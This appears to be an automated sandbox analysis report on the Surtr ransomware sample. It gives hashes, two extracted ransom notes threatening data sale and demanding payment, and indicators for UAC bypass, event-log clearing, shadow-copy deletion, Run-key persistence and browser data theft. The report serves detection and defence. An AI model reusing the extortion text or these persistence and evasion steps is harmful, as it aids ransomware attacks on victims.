surtr | 267fa786176679a2d99bf4d47cbcd8591640452ff393af7d61cfd5c0d8e67f33

Analysis

max time kernel
150s
max time network
141s
platform
windows10-2004_x64
resource
win10v2004-en-20220112
submitted
21-01-2022 03:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Surtr.exe
Size

383KB
MD5

709fedc6247f6c7a93dd570e15010dbe
SHA1

a3b061339364f053f521c894b0d5f08516fee493
SHA256

267fa786176679a2d99bf4d47cbcd8591640452ff393af7d61cfd5c0d8e67f33
SHA512

b6379dc973322b4e46fb79c5b88de30a763fe373cb5381e9d64b6ea56e33a6bb95529e970a53770337a3373efe48a766b9663421e901225da2fe6d1e245d118c

Score

10^/10

surtr evasion persistence ransomware spyware stealer trojan upx

Malware Config

Extracted

Path

C:\ProgramData\Service\SURTR_README.txt

Ransom Note

What happened to your files? Unfortunately, your server was compromised, using a security hole in your server. All your files are encrypted with a military algorithm . in order to contact us you can email this address [email protected] use this ID( AB3W6wRDMLbZ8u ) for the title of your email. if you weren't able to contact us within 24 hours please email : [email protected] Only we can decrypt your files. Please do not contact separate fraudulent sites. You can use freeand even paid software on the Internet, but it is uselessand will cause you to lose filesand timeand money.

Emails

[email protected]

Extracted

Path

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta

Family

surtr

Ransom Note

SurtrRansomware OOPS ALL YOUR IMPORTANT FILES HAVE BEEN ENCRYPTED AND STOLEN !! Notice : There is only one way to restore your data read the boxes carefully! Attention : Do Not change file names. Do Not try to decrypt using third party softwares , it may cause permanent data loss . your files will be sold on the Dark Web after 15 days. Imagine 1 million hackers have all your information including files, IP, name and number and location and ... Do not pay any money before decrypting the test files. You can use our 50% discount if you pay the fee within first 15 days of encryption . otherwise the price will be doubled. In order to warranty you , our team will decrypt 3 of your desired files for free.but you need to pay the specified price for the rest of the operation . How To Decrypt : Your system is offline . in order to contact us you can email this address [email protected] use this ID (AB3W6wRDMLbZ8u) for the title of your email . If you weren't able to contact us within 24 hours please email : [email protected] If you didn't get any respond within 48 hours use this link (Not Available Now).send your ID and your cryptor name (SurtrRansomwareUserName) therefore we can create another way to contact you as soon as possible

Emails

[email protected]

Signatures

Detects Surtr Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3436-131-0x0000000140000000-0x0000000140161000-memory.dmp	family_surtr

Surtr
Ransomware family first seen in late 2021.
ransomware surtr
UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal on Host

T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

pid	process
3880	wevtutil.exe
3972	wevtutil.exe
2924	wevtutil.exe
784	wevtutil.exe
3292	wevtutil.exe
2504	wevtutil.exe
1184	wevtutil.exe
428	wevtutil.exe
860	wevtutil.exe
3936	wevtutil.exe
3636	wevtutil.exe
272	wevtutil.exe
984
3768	wevtutil.exe
1140	wevtutil.exe
2560	wevtutil.exe
2748	wevtutil.exe
3468
2176	wevtutil.exe
3476	wevtutil.exe
3388	wevtutil.exe
1952	wevtutil.exe
788	wevtutil.exe
1688	wevtutil.exe
2576	wevtutil.exe
3296	wevtutil.exe
3932	wevtutil.exe
2416	wevtutil.exe
2580	wevtutil.exe
2472	wevtutil.exe
1912	wevtutil.exe
3388
3024	wevtutil.exe
3520	wevtutil.exe
2120	wevtutil.exe
3512	wevtutil.exe
1004	wevtutil.exe
1320	wevtutil.exe
2444	wevtutil.exe
4008	wevtutil.exe
2860	wevtutil.exe
4012	wevtutil.exe
312	wevtutil.exe
2068	wevtutil.exe
3032	wevtutil.exe
208	wevtutil.exe
2728	wevtutil.exe
3280	wevtutil.exe
3476	wevtutil.exe
2132	wevtutil.exe
788	wevtutil.exe
1172	wevtutil.exe
2184	wevtutil.exe
3468	wevtutil.exe
1540	wevtutil.exe
3512	wevtutil.exe
784	wevtutil.exe
3292	wevtutil.exe
2032	wevtutil.exe
2804	wevtutil.exe
3320	wevtutil.exe
3656	wevtutil.exe
1504	wevtutil.exe
2452	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

3664 bcdedit.exe
60 bcdedit.exe
Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

pid	process
3664	bcdedit.exe
60	bcdedit.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

WaaSMedicAgent.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p"	WaaSMedicAgent.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/3436-130-0x0000000140000000-0x0000000140161000-memory.dmp	upx
behavioral2/memory/3436-131-0x0000000140000000-0x0000000140161000-memory.dmp	upx
behavioral2/memory/3436-138-0x0000000140000000-0x0000000140161000-memory.dmp	upx

Drops startup file 6 IoCs

Processes:

cmd.execmd.execmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Surtr.exe

description	ioc	process
File opened (read-only)	\??\G:	Surtr.exe
File opened (read-only)	\??\P:	Surtr.exe
File opened (read-only)	\??\S:	Surtr.exe
File opened (read-only)	\??\T:	Surtr.exe
File opened (read-only)	\??\A:	Surtr.exe
File opened (read-only)	\??\Z:	Surtr.exe
File opened (read-only)	\??\B:	Surtr.exe
File opened (read-only)	\??\E:	Surtr.exe
File opened (read-only)	\??\H:	Surtr.exe
File opened (read-only)	\??\K:	Surtr.exe
File opened (read-only)	\??\N:	Surtr.exe
File opened (read-only)	\??\O:	Surtr.exe
File opened (read-only)	\??\R:	Surtr.exe
File opened (read-only)	\??\U:	Surtr.exe
File opened (read-only)	\??\X:	Surtr.exe
File opened (read-only)	\??\F:	Surtr.exe
File opened (read-only)	\??\I:	Surtr.exe
File opened (read-only)	\??\J:	Surtr.exe
File opened (read-only)	\??\L:	Surtr.exe
File opened (read-only)	\??\M:	Surtr.exe
File opened (read-only)	\??\Y:	Surtr.exe
File opened (read-only)	\??\Q:	Surtr.exe
File opened (read-only)	\??\V:	Surtr.exe
File opened (read-only)	\??\W:	Surtr.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

Surtr.exe

description pid process target process

PID 3916 set thread context of 3436 3916 Surtr.exe Surtr.exe

flow	ioc
1	ip-api.com

description	pid	process	target process
PID 3916 set thread context of 3436	3916	Surtr.exe	Surtr.exe

Drops file in Program Files directory 64 IoCs

Processes:

Surtr.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-utilities.xml.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PROOF\MSHY7FR.LEX.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ipscsy.xml.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-right.gif.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\Assertions\BeLessThan.Tests.ps1.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\bin\awt.dll.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\CT_ROOTS.XML.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\new_icons.png.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pl-pl\ui-strings.js.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nb-no\ui-strings.js.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Retail-ul-oob.xrm-ms.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected].[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Wordcnvpxy.cnv.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\COMPASS\PREVIEW.GIF.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-crt-convert-l1-1-0.dll.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-core.xml.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_Subscription-ppd.xrm-ms.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_fil.dll.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Word2019VL_MAK_AE-ul-oob.xrm-ms.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000006\FA000000006.[[email protected]].SURT	Surtr.exe
File created	C:\Program Files (x86)\Google\Private_DATA.surt	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-si\ui-strings.js.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\pl_get.svg.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small.png.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_O16EnterpriseVL_Bypass30-ul-oob.xrm-ms.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\lua\liblua_plugin.dll.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libball_plugin.dll.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int.gif.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\tr-tr\ui-strings.js.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\ink\en-US\mshwLatin.dll.mui.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\pt-PT.pak.DATA.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\illustrations_retina.png.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\file_icons.png.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\sat_logo_2x.png.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tt.txt.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\es-ES\sqloledb.rll.mui.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs.xml.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-crt-multibyte-l1-1-0.dll.[[email protected]].SURT	Surtr.exe
File created	C:\Program Files\WindowsApps\SURTR_README.txt	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nb-no\ui-strings.js.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\cs-cz\ui-strings.js.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.en-us.dll.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_SubTrial-pl.xrm-ms.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win.css.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\root\ui-strings.js.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-tw\ui-strings.js.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\de-de\ui-strings.js.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Sigma\Fingerprinting.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Common Files\System\ado\adojavas.inc.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.properties.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_zh_CN.jar.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\DatabaseCompare_k_col.hxk.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\RHP_icons.png.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sl_get.svg.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\theme.png.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nl-nl\ui-strings.js.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\sv-se\ui-strings.js.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-tw\ui-strings.js.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hr-hr\ui-strings.js.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\MSUIGHUB.TTF.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Windows Media Player\en-US\wmpnssui.dll.mui.[[email protected]].SURT	Surtr.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1500 schtasks.exe
3396 schtasks.exe
Interacts with shadow copies 2 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exe

pid process

1216 vssadmin.exe
3744 vssadmin.exe
3336 vssadmin.exe

pid	process
1500	schtasks.exe
3396	schtasks.exe

pid	process
1216	vssadmin.exe
3744	vssadmin.exe
3336	vssadmin.exe

Modifies data under HKEY_USERS 41 IoCs

Processes:

WaaSMedicAgent.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe

Runs net.exe
Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

Surtr.exe

pid process

3436 Surtr.exe
3436 Surtr.exe
3436 Surtr.exe
3436 Surtr.exe
3436 Surtr.exe
3436 Surtr.exe
3436 Surtr.exe
3436 Surtr.exe

pid	process
3436	Surtr.exe
3436	Surtr.exe
3436	Surtr.exe
3436	Surtr.exe
3436	Surtr.exe
3436	Surtr.exe
3436	Surtr.exe
3436	Surtr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

vssvc.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

description	pid	process
Token: SeBackupPrivilege	4020	vssvc.exe
Token: SeRestorePrivilege	4020	vssvc.exe
Token: SeAuditPrivilege	4020	vssvc.exe
Token: SeSecurityPrivilege	1164	wevtutil.exe
Token: SeBackupPrivilege	1164	wevtutil.exe
Token: SeSecurityPrivilege	428	wevtutil.exe
Token: SeBackupPrivilege	428	wevtutil.exe
Token: SeSecurityPrivilege	3564	wevtutil.exe
Token: SeBackupPrivilege	3564	wevtutil.exe
Token: SeSecurityPrivilege	3024	wevtutil.exe
Token: SeBackupPrivilege	3024	wevtutil.exe
Token: SeSecurityPrivilege	912	wevtutil.exe
Token: SeBackupPrivilege	912	wevtutil.exe
Token: SeSecurityPrivilege	3452	wevtutil.exe
Token: SeBackupPrivilege	3452	wevtutil.exe
Token: SeSecurityPrivilege	1172	wevtutil.exe
Token: SeBackupPrivilege	1172	wevtutil.exe
Token: SeSecurityPrivilege	908	wevtutil.exe
Token: SeBackupPrivilege	908	wevtutil.exe
Token: SeSecurityPrivilege	3472	wevtutil.exe
Token: SeBackupPrivilege	3472	wevtutil.exe
Token: SeSecurityPrivilege	3768	wevtutil.exe
Token: SeBackupPrivilege	3768	wevtutil.exe
Token: SeSecurityPrivilege	984	wevtutil.exe
Token: SeBackupPrivilege	984	wevtutil.exe
Token: SeSecurityPrivilege	820	wevtutil.exe
Token: SeBackupPrivilege	820	wevtutil.exe
Token: SeSecurityPrivilege	3792	wevtutil.exe
Token: SeBackupPrivilege	3792	wevtutil.exe
Token: SeSecurityPrivilege	1644	wevtutil.exe
Token: SeBackupPrivilege	1644	wevtutil.exe
Token: SeSecurityPrivilege	3196	wevtutil.exe
